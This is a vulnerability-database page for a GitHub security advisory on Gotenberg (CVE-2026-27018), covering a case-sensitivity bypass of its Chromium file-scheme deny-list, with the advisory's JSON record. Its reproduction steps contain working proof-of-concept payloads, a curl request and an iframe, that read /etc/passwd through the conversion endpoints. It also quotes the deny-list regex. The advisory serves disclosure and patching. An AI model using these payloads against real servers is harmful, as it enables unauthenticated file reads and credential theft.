GHSA-JJWV-57XH-XR6R

Vulnerability from github – Published: 2026-03-30 16:16 – Updated: 2026-04-06 17:26
VLAI?
Summary
Gotenberg has Chromium deny-list bypass via case-insensitive URL scheme (bypass of GHSA-rh2x-ccvw-q7r3)
Details

Impact

The fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.

The default --chromium-deny-list value is ^file:(?!//\/tmp/).*. This regex is anchored to lowercase file: at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like FILE:///etc/passwd or File:///etc/passwd bypasses the deny-list check but still gets resolved by Chromium as file:///etc/passwd.

The root cause is in pkg/gotenberg/filter.go — the FilterDeadline function compiles the deny-list regex with regexp2.MustCompile(denied.String(), 0), where 0 means no flags (case-sensitive). Since the regex pattern itself doesn't include a (?i) flag, matching is strictly case-sensitive.

This affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).

Steps to Reproduce

  1. Start Gotenberg with default settings:
docker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg
  1. Read /etc/passwd via the URL endpoint using an uppercase scheme:
curl -X POST 'http://localhost:3000/forms/chromium/convert/url' \
  --form 'url=FILE:///etc/passwd' -o output.pdf

  1. Open output.pdf — it contains the contents of /etc/passwd.

  2. Alternatively, create an index.html:

<iframe src="FILE:///etc/passwd" width="100%" height="100%"></iframe>

Then convert it:

curl -X POST 'http://localhost:3000/forms/chromium/convert/html' \
  -F 'files=@index.html' -o output.pdf
  1. The resulting PDF contains /etc/passwd contents.

Mixed-case variants like File:, fILE:, fiLE: etc. all work as well.

Root Cause

  • pkg/modules/chromium/chromium.go defines the default deny-list as ^file:(?!//\/tmp/).*
  • pkg/gotenberg/filter.go compiles this with regexp2.MustCompile(denied.String(), 0) — flag 0 means case-sensitive
  • pkg/modules/chromium/events.go uses FilterDeadline to check intercepted request URLs against the deny-list
  • Chromium normalizes URL schemes to lowercase, so FILE:///etc/passwd becomes file:///etc/passwd after the deny-list check has already passed

Suggested Fix

Change the default deny-list regex to use a case-insensitive flag:

(?i)^file:(?!//\/tmp/).*

Or apply case-insensitive matching in FilterDeadline when compiling the regex.

Severity

This is effectively the same impact as CVE-2024-21527 — unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.

Severity ?
7.8 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.29.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/gotenberg/gotenberg/v7"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "7.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27018"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-30T16:16:07Z",
    "nvd_published_at": "2026-03-30T21:17:08Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nThe fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.\n\nThe default `--chromium-deny-list` value is `^file:(?!//\\/tmp/).*`. This regex is anchored to lowercase `file:` at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like `FILE:///etc/passwd` or `File:///etc/passwd` bypasses the deny-list check but still gets resolved by Chromium as `file:///etc/passwd`.\n\nThe root cause is in `pkg/gotenberg/filter.go` \u2014 the `FilterDeadline` function compiles the deny-list regex with `regexp2.MustCompile(denied.String(), 0)`, where `0` means no flags (case-sensitive). Since the regex pattern itself doesn\u0027t include a `(?i)` flag, matching is strictly case-sensitive.\n\nThis affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).\n\n### Steps to Reproduce\n\n1. Start Gotenberg with default settings:\n\n```bash\ndocker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg\n```\n\n2. Read `/etc/passwd` via the URL endpoint using an uppercase scheme:\n\n```bash\ncurl -X POST \u0027http://localhost:3000/forms/chromium/convert/url\u0027 \\\n  --form \u0027url=FILE:///etc/passwd\u0027 -o output.pdf\n```\n\n3. Open `output.pdf` \u2014 it contains the contents of `/etc/passwd`.\n\n4. Alternatively, create an `index.html`:\n\n```html\n\u003ciframe src=\"FILE:///etc/passwd\" width=\"100%\" height=\"100%\"\u003e\u003c/iframe\u003e\n```\n\nThen convert it:\n\n```bash\ncurl -X POST \u0027http://localhost:3000/forms/chromium/convert/html\u0027 \\\n  -F \u0027files=@index.html\u0027 -o output.pdf\n```\n\n5. The resulting PDF contains `/etc/passwd` contents.\n\nMixed-case variants like `File:`, `fILE:`, `fiLE:` etc. all work as well.\n\n### Root Cause\n\n- `pkg/modules/chromium/chromium.go` defines the default deny-list as `^file:(?!//\\/tmp/).*`\n- `pkg/gotenberg/filter.go` compiles this with `regexp2.MustCompile(denied.String(), 0)` \u2014 flag `0` means case-sensitive\n- `pkg/modules/chromium/events.go` uses `FilterDeadline` to check intercepted request URLs against the deny-list\n- Chromium normalizes URL schemes to lowercase, so `FILE:///etc/passwd` becomes `file:///etc/passwd` after the deny-list check has already passed\n\n### Suggested Fix\n\nChange the default deny-list regex to use a case-insensitive flag:\n\n```\n(?i)^file:(?!//\\/tmp/).*\n```\n\nOr apply case-insensitive matching in `FilterDeadline` when compiling the regex.\n\n### Severity\n\nThis is effectively the same impact as CVE-2024-21527 \u2014 unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.",
  "id": "GHSA-jjwv-57xh-xr6r",
  "modified": "2026-04-06T17:26:27Z",
  "published": "2026-03-30T16:16:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-jjwv-57xh-xr6r"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rh2x-ccvw-q7r3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27018"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/commit/06b2b2e10c52b58135edbfe82e94d599eb0c5a11"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/commit/8625a4e899eb75e6fcf46d28394334c7fd79fff5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gotenberg/gotenberg"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gotenberg/gotenberg/releases/tag/v8.29.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gotenberg has Chromium deny-list bypass via case-insensitive URL scheme (bypass of GHSA-rh2x-ccvw-q7r3)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.